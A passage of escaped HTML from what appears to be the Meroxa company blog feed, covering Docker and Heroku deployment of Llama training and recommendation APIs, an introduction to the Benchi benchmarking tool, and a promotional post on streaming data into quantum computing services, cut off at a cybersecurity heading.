Nv0c0R9F7tUUVcVIggdFUtak9Jtx4K+OdQFtgLHLnk83JgCcylCfobq08/xsD6FwdEJqtgE2TCpxsvA3xhDhOH6UzSmX6BJz94S3+XlrT18oNznlzfxit61uYXVK+E1vaPzK5uU7g5WtvbwB6rLzaaHn3dhAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Dockerfile for the training API&quot;
        title=&quot;&quot;
        src=&quot;/static/226151ceea1166cdee01a328d57ed214/5a190/train-docker.png&quot;
        srcset=&quot;/static/226151ceea1166cdee01a328d57ed214/772e8/train-docker.png 200w,
/static/226151ceea1166cdee01a328d57ed214/e17e5/train-docker.png 400w,
/static/226151ceea1166cdee01a328d57ed214/5a190/train-docker.png 800w,
/static/226151ceea1166cdee01a328d57ed214/ee3fb/train-docker.png 1144w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
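&lt;p&gt;The training server&apos;s Dockerfile follows the same pattern, differing mainly in the module it serves. Again, this is a hedged sketch rather than the exact file shown:&lt;/p&gt;

```dockerfile
# training/Dockerfile -- illustrative sketch; module path is an assumption.
FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Heroku injects the listening port at runtime via $PORT.
CMD gunicorn --bind 0.0.0.0:$PORT training_server:app
```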
&lt;h3&gt;5.3. Deploying to Heroku&lt;/h3&gt;
&lt;p&gt;Use the following CLI commands to deploy your API endpoints via Docker to Heroku:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/68e24fb0cc7bdf83b13c2c853cbef45a/73caa/heroku-deploy.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACiUlEQVR42pWU204TURSG+xyGUzuHdjrttNPDzLTTk4KJ8T000egFXuCdMRGqgdQqhoLEIhSk5XyWAioEjA9TH2GS+V17l5JgUoMXf9bqmu4/31prz3hWv547q4fnWG/+JF2A5f8ndubC3Tj5hbXDi5ancXDmLO2cYLxSxatSBaOlKYy+vaHKUyiWKxifqrr1/VOsHpy1PPX9H87k/AruJ3TcK/RDTHkheHvhE3vgE3ogCL1dJYp98A7cQigccGeXt1HfO215iM4pzcwjHtMQDHqhhET4Az4EVYnUzrtKESDJA9CiqjtZXcbi9vFvT23zyHn9/iNStoFszoRlxZDNmtBjKjf9p2GgbRiOBN3S9DwWNprMsOkUyTAaCxOhCDUkUwt+KEEBAcVHEnjuD3i7G2qKO1GZ6xgeOWPlGU6Yy1tEqMO2k8hkDNiZJK/l8imkqSb726YsypemMhmGrhs2ectRPcSJFKJUOJXIiXmk1kNEziKjZbNlYs+6EqaJqHCbSNJxZLKUF1KwUjHkKbJ5MqOwJkNVZYp+GgvlIQmi1P83ITOchp21MHQ3T60xYxuDQzlq2eC1fCGNhKkhnhZg2WFansV1ZzCLRDICjZZyreXiuxkkzRgniic0GEaU57F4GCZt3TB1HiO6H7opwLCivMbmyup6XHPpcmNh85LwzeQsw4bP18NnwtpgkuT+q1yU+vgzSfJe/WbRS2dUutgTlc9twsWtY4e5R/QwN7jaIttoR2yjl7VOvbPxzj0szy6itkkXe2n7xJmureP5yyIeD4/g4dNnePBk+EZi/31EZ0ZejPFX78vOt/a7XNs6RnVlDxUy/jDXINVvqAadWcOnxq67vPsd9IFo/QGvfGer2zcJbwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Heroku Docker deploy CLI commands&quot;
        title=&quot;&quot;
        src=&quot;/static/68e24fb0cc7bdf83b13c2c853cbef45a/5a190/heroku-deploy.png&quot;
        srcset=&quot;/static/68e24fb0cc7bdf83b13c2c853cbef45a/772e8/heroku-deploy.png 200w,
/static/68e24fb0cc7bdf83b13c2c853cbef45a/e17e5/heroku-deploy.png 400w,
/static/68e24fb0cc7bdf83b13c2c853cbef45a/5a190/heroku-deploy.png 800w,
/static/68e24fb0cc7bdf83b13c2c853cbef45a/73caa/heroku-deploy.png 1110w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;Scale and Monitor Your Heroku Apps:&lt;/h4&gt;
&lt;p&gt;Your app will be available at &lt;code class=&quot;language-text&quot;&gt;https://your-app-name.herokuapp.com&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For the training server, ensure the &lt;code class=&quot;language-text&quot;&gt;/trigger-training&lt;/code&gt; endpoint is accessible; for the recommendations API, use &lt;code class=&quot;language-text&quot;&gt;/recommend&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Use the Heroku dashboard or CLI commands (e.g., &lt;code class=&quot;language-text&quot;&gt;heroku ps:scale web=1 --app your-app-name&lt;/code&gt;) to adjust the number of dynos based on your traffic requirements.&lt;/li&gt;
&lt;li&gt;Heroku provides built-in logging (&lt;code class=&quot;language-text&quot;&gt;heroku logs --tail --app your-app-name&lt;/code&gt;), and you can integrate additional monitoring tools if needed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Repeat these steps for each service by creating separate Heroku apps or configuring them as separate processes within one app.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Congratulations! You&apos;ve just built an end-to-end AI pipeline that takes you from raw data to a deployed model. Here&apos;s what we accomplished:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Built a powerful Meroxa pipeline that seamlessly handles your data - from raw files in S3 all the way through to processed JSONL format, ready for training&lt;/li&gt;
&lt;li&gt;Created a smart training server that automatically fine-tunes your Llama model when new data arrives&lt;/li&gt;
&lt;li&gt;Set up a production-ready API that serves real-time recommendations using your fine-tuned model&lt;/li&gt;
&lt;li&gt;Learned how to deploy everything to the cloud using Docker and Heroku, making your solution production-ready&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;With this setup, you now have an automated system powered by Meroxa&apos;s Conduit Platform that handles everything from data processing to model deployment. The best part? It&apos;s scalable and ready to grow with your needs.&lt;/p&gt;
&lt;p&gt;Now it&apos;s your turn to build something amazing! Happy coding! 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Benchmarking Made Simple with Benchi]]></title><description><![CDATA[Benchi is a minimal benchmarking framework designed to help you measure the performance of your applications and infrastructure. It leverages Docker to create isolated environments for running benchmarks and collecting metrics.]]></description><link>https://meroxa.com/blog/benchmarking-made-simple-with-benchi</link><guid isPermaLink="false">https://meroxa.com/blog/benchmarking-made-simple-with-benchi</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 26 Mar 2025 12:11:00 GMT</pubDate><content:encoded>&lt;p&gt;Benchmarking is one of those things every developer faces one day. It all starts with a question. What kind of load can my app handle? What&apos;s the maximum throughput of my pipeline? Is that shiny new data tool really faster than the one I&apos;m using?&lt;/p&gt;
&lt;p&gt;We&apos;re excited to introduce &lt;a href=&quot;https://github.com/conduitio/benchi&quot;&gt;&lt;strong&gt;Benchi&lt;/strong&gt;&lt;/a&gt;, a minimal yet powerful benchmarking framework that makes it easy to answer these questions. It was originally built to benchmark &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt;, but it quickly became clear that &lt;strong&gt;Benchi could work for any tool&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Why Benchi?&lt;/h2&gt;
&lt;p&gt;Benchmarking is supposed to give you confidence. But if you&apos;ve tried benchmarking tools before, you&apos;ve probably run into this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The need to manually set up the environment.&lt;/li&gt;
&lt;li&gt;Metrics scattered across logs, dashboards, or worse — missing.&lt;/li&gt;
&lt;li&gt;No easy way to track progress or compare results across runs and tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Benchi fixes this. It&apos;s a framework for running benchmarks and collecting their results, without reinventing the wheel for each project.&lt;/p&gt;
&lt;h3&gt;Key features of Benchi:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;⚙️ &lt;strong&gt;Docker-Driven&lt;/strong&gt;: Use Docker Compose to spin up isolated, reproducible benchmarking environments.&lt;/li&gt;
&lt;li&gt;📊 &lt;strong&gt;Terminal UI&lt;/strong&gt;: Real-time feedback while your benchmarks run. See metrics as they are collected.&lt;/li&gt;
&lt;li&gt;📁 &lt;strong&gt;Metrics Collection&lt;/strong&gt;: Performance data is automatically collected and saved as &lt;strong&gt;CSV&lt;/strong&gt; for further analysis. If your app exposes a Prometheus endpoint, Benchi can collect metrics from it!&lt;/li&gt;
&lt;li&gt;🪝 &lt;strong&gt;Custom Hooks&lt;/strong&gt;: Run any script or command at any stage - before, during, or after the benchmark.&lt;/li&gt;
&lt;li&gt;🔄 &lt;strong&gt;Multi-Tool Comparison&lt;/strong&gt;: Benchmark multiple tools &lt;strong&gt;under identical conditions&lt;/strong&gt; to see which one holds up.&lt;/li&gt;
&lt;/ul&gt;
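&lt;p&gt;The Prometheus integration works because the text exposition format is simple to scrape: one metric per line, comments prefixed with &lt;code class=&quot;language-text&quot;&gt;#&lt;/code&gt;. Here is a minimal Python sketch of parsing such a payload. This is illustrative only, not Benchi&apos;s actual collector, and the metric names in the sample are made up:&lt;/p&gt;

```python
# Minimal sketch: parse a Prometheus text-exposition payload into a dict.
# Not Benchi's own collector; it just shows the format being consumed.

def parse_prometheus(payload: str) -> dict:
    metrics = {}
    for line in payload.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):  # skip HELP/TYPE comment lines
            continue
        # The value is the last whitespace-separated token on the line.
        name, _, value = line.rpartition(" ")
        metrics[name] = float(value)
    return metrics

sample = """
# HELP conduit_pipeline_msgs_total Messages processed.
# TYPE conduit_pipeline_msgs_total counter
conduit_pipeline_msgs_total 12500
process_cpu_seconds_total 3.25
"""

print(parse_prometheus(sample))
```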
&lt;h2&gt;Example: Benchmarking Conduit with Benchi&lt;/h2&gt;
&lt;p&gt;Let&apos;s say you want to benchmark &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; streaming data between two Kafka topics. We prepared an &lt;a href=&quot;https://github.com/ConduitIO/benchi/tree/main/example&quot;&gt;example&lt;/a&gt; configuration, so this can be achieved using a one-liner:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;benchi &lt;span class=&quot;token parameter variable&quot;&gt;-config&lt;/span&gt; ./example/bench-kafka-kafka/bench.yml&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running this command will do the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Run the infrastructure (Kafka) and tool (Conduit) in a clean, isolated Docker environment.&lt;/li&gt;
&lt;li&gt;Produce the test data using custom hooks.&lt;/li&gt;
&lt;li&gt;Display progress and collected metrics as the benchmark is running.&lt;/li&gt;
&lt;li&gt;Save all logs and metrics in the results folder.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/421459407-334d854d-0466-489c-bff6-95f4471b457f.gif&quot; alt=&quot;Benchi terminal UI showing a running benchmark&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Start Benchmarking Smarter&lt;/h2&gt;
&lt;p&gt;🚀 &lt;strong&gt;Try it now:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;go &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; github.com/conduitio/benchi@latest&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;📚 Full docs + examples: &lt;a href=&quot;https://github.com/conduitio/benchi&quot;&gt;github.com/conduitio/benchi&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Let us know what you&apos;re benchmarking and how Benchi helps you optimize it!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Quantum Computing + Meroxa: Real-Time Data Streaming for Next-Gen Innovation]]></title><description><![CDATA[Quantum computing is revolutionizing industries, but real-time data movement is the key to unlocking its full potential. This blog explores how Meroxa seamlessly streams, transforms, and integrates structured data into quantum systems like IBM Quantum, Google Cirq, and D-Wave Leap, enabling faster insights and next-gen innovation.  
 ]]></description><link>https://meroxa.com/blog/quantum-computing-meroxa-real-time-data-streaming-for-next-gen-innovation</link><guid isPermaLink="false">https://meroxa.com/blog/quantum-computing-meroxa-real-time-data-streaming-for-next-gen-innovation</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 05 Mar 2025 12:22:00 GMT</pubDate><content:encoded>&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;As &lt;strong&gt;quantum computing&lt;/strong&gt; advances from theoretical research to real-world applications, businesses across industries are seeking ways to &lt;strong&gt;integrate quantum capabilities&lt;/strong&gt; into their data ecosystems. &lt;strong&gt;Meroxa&lt;/strong&gt;, a leader in real-time data movement, is uniquely positioned to bridge the gap between &lt;strong&gt;classical computing and quantum data processing&lt;/strong&gt;, enabling seamless &lt;strong&gt;data streaming and transformation&lt;/strong&gt; for quantum workloads.&lt;/p&gt;
&lt;p&gt;This blog explores how &lt;strong&gt;Meroxa supports quantum computing&lt;/strong&gt;, its integration within &lt;strong&gt;high-performance computing (HPC) environments&lt;/strong&gt;, and the industries poised to benefit from quantum-powered analytics.&lt;/p&gt;
&lt;h3&gt;The Need for Quantum Computing in Data-Intensive Workflows&lt;/h3&gt;
&lt;p&gt;Quantum computing promises &lt;strong&gt;exponential computational power&lt;/strong&gt; over traditional computing methods, making it ideal for solving &lt;strong&gt;complex optimization, cryptography, and simulation problems&lt;/strong&gt;. However, one of the biggest challenges in quantum computing is &lt;strong&gt;feeding real-time, structured, and unstructured data into quantum systems&lt;/strong&gt; efficiently.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How does Meroxa fit in?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Ingestion&lt;/strong&gt;: Quantum algorithms require &lt;strong&gt;high-fidelity data streams&lt;/strong&gt;. Meroxa enables real-time ingestion from &lt;strong&gt;PostgreSQL, ClickHouse, Kafka, and other sources&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Transformation at Scale&lt;/strong&gt;: Quantum processors need data in a specific format. Meroxa’s &lt;strong&gt;low-latency transformation pipelines&lt;/strong&gt; prepare datasets for quantum algorithms.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hybrid Quantum-Classical Processing&lt;/strong&gt;: Industries using &lt;strong&gt;hybrid quantum-classical workflows&lt;/strong&gt; can leverage Meroxa to move data between &lt;strong&gt;traditional HPC clusters and quantum computing environments&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Meroxa + Quantum Computing: Technical Integration&lt;/h3&gt;
&lt;p&gt;Meroxa provides &lt;strong&gt;real-time data movement and preparation&lt;/strong&gt; for quantum computing workloads through &lt;strong&gt;three key components&lt;/strong&gt;:&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;1. Streaming Data to Quantum Systems&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum computing is often &lt;strong&gt;batch-driven&lt;/strong&gt;, but Meroxa introduces a &lt;strong&gt;streaming-first approach&lt;/strong&gt; by integrating with quantum cloud providers such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;IBM Quantum&lt;/strong&gt; (Qiskit Runtime APIs)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google’s Quantum AI&lt;/strong&gt; (Cirq + TensorFlow Quantum)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;D-Wave Leap&lt;/strong&gt; (Hybrid quantum-classical optimization)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example pipeline using &lt;strong&gt;Conduit Platform&lt;/strong&gt; to send &lt;strong&gt;structured data&lt;/strong&gt; to a quantum computing service:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; quantum&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://root:root@127.0.0.1:5432/testdb&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; quantum_inputs
          &lt;span class=&quot;token key atrule&quot;&gt;columns&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;input_params&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;polling_interval&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;5s&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; quantum&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;api&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;http
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://api.ibmquantum.com/v1/jobs&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;method&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; POST
          &lt;span class=&quot;token key atrule&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;application/json&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;body_template&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
            {
              &quot;job_id&quot;: &quot;{{.id}}&quot;,
              &quot;input_params&quot;: &quot;{{.input_params}}&quot;,
              &quot;timestamp&quot;: &quot;{{.timestamp}}&quot;
            }&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
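&lt;p&gt;For each record, the HTTP destination fills in &lt;code class=&quot;language-text&quot;&gt;body_template&lt;/code&gt; with the record&apos;s fields. The Python sketch below shows the JSON payload such a template would produce for a sample row; the field values are made up for illustration:&lt;/p&gt;

```python
import json

# Hypothetical record as the Postgres source might emit it; the field names
# mirror the body_template above, the values are invented for illustration.
record = {
    "id": "job-001",
    "input_params": "[0.12, 0.87]",
    "timestamp": "2025-03-05T12:00:00Z",
}

# Rendering the template maps record fields onto the request body:
payload = {
    "job_id": record["id"],
    "input_params": record["input_params"],
    "timestamp": record["timestamp"],
}

print(json.dumps(payload))
```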
&lt;h4&gt;&lt;strong&gt;2. Real-Time Data Preprocessing for Quantum Workloads&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum computers require &lt;strong&gt;normalized, noise-resistant input&lt;/strong&gt;. Meroxa automates:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data normalization&lt;/strong&gt; for quantum algorithms (amplitude encoding, basis encoding).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Error correction pre-processing&lt;/strong&gt; for quantum noise reduction.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimized batch-size management&lt;/strong&gt; for quantum circuits.&lt;/li&gt;
&lt;/ul&gt;
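&lt;p&gt;Amplitude encoding, for instance, requires the input vector to have unit L2 norm, since a quantum state&apos;s squared amplitudes must sum to 1. A minimal Python sketch of that normalization step (illustrative only, not Meroxa&apos;s implementation):&lt;/p&gt;

```python
import math

def amplitude_encode(features):
    """Scale a feature vector to unit L2 norm, as amplitude encoding
    requires: the squared amplitudes of a quantum state must sum to 1."""
    norm = math.sqrt(sum(x * x for x in features))
    if norm == 0:
        raise ValueError("cannot encode the zero vector")
    return [x / norm for x in features]

state = amplitude_encode([3.0, 4.0])
print(state)  # [0.6, 0.8]
```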
&lt;p&gt;Example: Streaming normalized datasets into &lt;strong&gt;Google’s Cirq framework&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/quantum-Google-Cirq.png&quot; alt=&quot;Streaming normalized datasets into Google Cirq&quot;&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;3. Hybrid Quantum-Classical Workflows&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Many industries will operate &lt;strong&gt;hybrid architectures&lt;/strong&gt;, using &lt;strong&gt;quantum&lt;/strong&gt; for high-complexity tasks and &lt;strong&gt;classical computing&lt;/strong&gt; for traditional processing. Meroxa enables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Event-driven data routing&lt;/strong&gt; between &lt;strong&gt;HPC clusters and quantum machines&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Parallel job execution&lt;/strong&gt;, reducing compute bottlenecks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hybrid orchestration&lt;/strong&gt;, ensuring seamless transition between &lt;strong&gt;classical and quantum environments&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example: Managing hybrid workflows with &lt;strong&gt;D-Wave Leap&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/quantum-dwave-leap.png&quot; alt=&quot;Hybrid quantum-classical workflow with D-Wave Leap&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Meroxa Quantum Computing Workflow Visualization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;To illustrate how Meroxa integrates with quantum computing, consider the following workflow:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/quantum-industries.png&quot; alt=&quot;Meroxa quantum computing workflow&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Industries Leveraging Quantum Computing with Meroxa&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;1. Financial Services: Risk Analysis &amp;#x26; Fraud Detection&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum computing is transforming financial modeling by &lt;strong&gt;optimizing risk assessment&lt;/strong&gt; and &lt;strong&gt;detecting fraudulent transactions&lt;/strong&gt; in real time.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/financial-risk.png&quot; alt=&quot;Quantum-powered financial risk analysis workflow&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; Streaming transaction data into quantum-powered Monte Carlo simulations for fraud detection.&lt;/li&gt;
&lt;/ul&gt;
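&lt;p&gt;For intuition, here is a classical Monte Carlo sketch of the kind of risk estimate a quantum backend would accelerate. The loss model, threshold, and rates are hypothetical placeholders:&lt;/p&gt;

```python
import random

def fraud_risk_monte_carlo(amount, base_rate, n=100_000, seed=42):
    """Estimate the probability that a simulated fraudulent loss exceeds a
    threshold. A classical stand-in for the quantum-accelerated version;
    the loss model and threshold are hypothetical."""
    rng = random.Random(seed)          # fixed seed for reproducibility
    threshold = amount * 0.5           # hypothetical loss threshold
    hits = 0
    for _ in range(n):
        # Each trial: fraud occurs with probability base_rate, and the
        # loss is a uniform random fraction of the transaction amount.
        is_fraud = base_rate > rng.random()
        loss = rng.random() * amount
        if is_fraud and loss > threshold:
            hits += 1
    return hits / n

# Expected value is roughly base_rate * 0.5 = 0.025 for these inputs.
print(fraud_risk_monte_carlo(1000.0, 0.05))
```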
&lt;h4&gt;&lt;strong&gt;2. Pharmaceuticals &amp;#x26; Drug Discovery&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Pharma companies are using quantum computing for &lt;strong&gt;molecular simulation&lt;/strong&gt;, drastically reducing time for &lt;strong&gt;drug discovery&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/pharmaceutical.png&quot; alt=&quot;Quantum-assisted drug discovery workflow&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; Real-time movement of &lt;strong&gt;genomic datasets&lt;/strong&gt; between research labs and quantum simulators.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;3. Logistics &amp;#x26; Supply Chain Optimization&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum algorithms are solving &lt;strong&gt;route optimization&lt;/strong&gt; for global supply chains.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/logistics.png&quot; alt=&quot;Quantum route optimization for logistics&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; &lt;strong&gt;Streaming IoT sensor data&lt;/strong&gt; into quantum models for predictive logistics.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;4. Cybersecurity &amp;#x26; Cryptography&lt;/strong&gt;&lt;/h4&gt;
